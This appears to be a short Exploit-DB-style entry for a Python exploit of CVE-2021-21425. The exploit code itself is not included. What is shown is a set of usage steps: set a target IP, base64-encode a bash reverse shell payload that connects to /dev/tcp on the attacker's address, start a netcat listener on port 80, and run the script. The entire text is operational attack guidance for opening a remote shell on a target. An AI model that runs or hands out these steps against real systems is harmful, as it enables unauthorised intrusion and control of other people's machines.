
Python exploit for CVE-2021-21425 that executes a reverse shell payload against a target IP, with instructions for setting up a netcat listener.
source: https://www.exploit-db.com/exploits/49973
[1] change target ip
[2] change payload
echo -ne "bash -i >& /dev/tcp/OUR-IP/80 0>&1" | base64 -w0
[3] sudo nc -lvnp 80
[4] python3 exploit.py